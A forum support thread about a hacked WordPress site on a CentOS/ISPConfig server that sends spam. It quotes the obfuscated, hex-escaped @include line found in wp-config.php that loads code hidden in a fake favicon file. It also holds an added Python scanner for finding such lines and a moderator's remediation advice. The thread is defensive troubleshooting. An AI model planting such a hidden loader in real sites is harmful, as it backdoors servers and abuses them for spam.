CENTOS server suddenly sending spam????

Discussion in 'ISPConfig 3 Priority Support' started by craig baker, Jan 3, 2018.

  1. craig baker

    craig baker Member HowtoForge Supporter

    I just noticed a complaint from my ISP (Verizon) that my server was generating complaints. Well, I see 34,000 messages all being sent from a single domain - which is a sandbox. No website, no nothing.
    I killed all the messages from or to the domain with postsuper - but it keeps generating new spams!!!
    Finally I removed the email record from ISPCONFIG so that domain is no longer recognized.
    But I was seeing a php-cgi invocation from the user (web45) associated with that website and I kept having to kill -9.
    Finally I renamed the web folder of the site and that seems to have prevented it. Something was hitting a url on a site hanging off this - and that hit was causing spam to be generated!
    The wp-config.php of the site had a suspicious line at the top:
    @include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";
    That's obviously /var/www/hocheapo.com/web/stats/favicon_something.ico

    and maldet was flagging this and quarantining it. But how does it keep being created??? This seems to be dropped in the stats folder which I renamed.

    removing the email record does NOT stop the spam by the way! only renaming the root away from /web has stopped it!

    Any idea what is doing this? or how to prevent it 'properly'?? anything else I need to do to protect against it?

    thanks!
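As an added example (not code from this thread) of how to find more lines like the one quoted in the post above: this Python script, using only the standard library, scans a site's .php files for include/require statements whose path is hidden behind \xNN escapes and decodes them. The sample wp-config.php content is constructed from the quoted line; the web-root path passed to scan_web_root is whatever the site's root is.

```python
import os
import re

# Constructed sample: the obfuscated line from the post above, as it would
# sit at the top of a tampered wp-config.php.
SAMPLE_WP_CONFIG = r'''<?php
@include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";
define('DB_NAME', 'wordpress');
require_once ABSPATH . 'wp-settings.php';
'''

# include/require whose argument is a double-quoted string with at least one
# \xNN escape. Single-quoted PHP strings do not expand \x, so only "..." matters.
OBFUSCATED_INCLUDE = re.compile(
    r'@?\b(include_once|include|require_once|require)\s*\(?\s*'
    r'"((?:[^"\\]|\\.)*?\\x[0-9A-Fa-f]{2}(?:[^"\\]|\\.)*)"')

def decode_php_string(s):
    r"""Expand the PHP double-quoted escapes \xNN, \n, \t, \\, \" and \$."""
    simple = {'n': '\n', 't': '\t', '\\': '\\', '"': '"', '$': '$'}
    def repl(m):
        esc = m.group(1)
        if esc[0] == 'x':
            return chr(int(esc[1:], 16))
        return simple.get(esc, '\\' + esc)  # unknown escapes stay literal, as in PHP
    return re.sub(r'\\(x[0-9A-Fa-f]{2}|.)', repl, s)

def find_obfuscated_includes(source):
    """One finding per hidden include: raw statement, decoded path, and whether
    the target is not a .php file (PHP code hidden in an .ico is a strong hint)."""
    findings = []
    for m in OBFUSCATED_INCLUDE.finditer(source):
        path = decode_php_string(m.group(2))
        findings.append({'statement': m.group(0), 'decoded_path': path,
                         'non_php_target': not path.lower().endswith('.php')})
    return findings

def scan_web_root(root):
    """Walk a site's web root and report hidden includes in every .php file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                full = os.path.join(dirpath, name)
                with open(full, encoding='utf-8', errors='replace') as fh:
                    hits = find_obfuscated_includes(fh.read())
                if hits:
                    report[full] = hits
    return report

if __name__ == '__main__':
    for hit in find_obfuscated_includes(SAMPLE_WP_CONFIG):
        print(hit['decoded_path'], '(non-PHP target)' if hit['non_php_target'] else '')
```

Run it against the real web root with scan_web_root('/var/www/example.com/web') and review each decoded path, together with the web user's crontab, before deciding what to clean.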
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    This looks like a normal WordPress hack.

    The email record is not related to the website that sends spam. An email record is for receiving email and for authenticating a mail user, but your system is sending email from a local website.

    This website has a wp-config.php so it seems to run Wordpress, right? In that case, Wordpress has been hacked. So this Wordpress install is either not up to date or it uses a vulnerable theme or plugin.

    Update Wordpress, update the used plugins and themes. If it happens again, then you'll have to investigate which part of the WP code is vulnerable and used to upload the malware file. You should also check the crontab of that web user to ensure that the malware did not place a cronjob there (crontab -e -u webXXX).
     
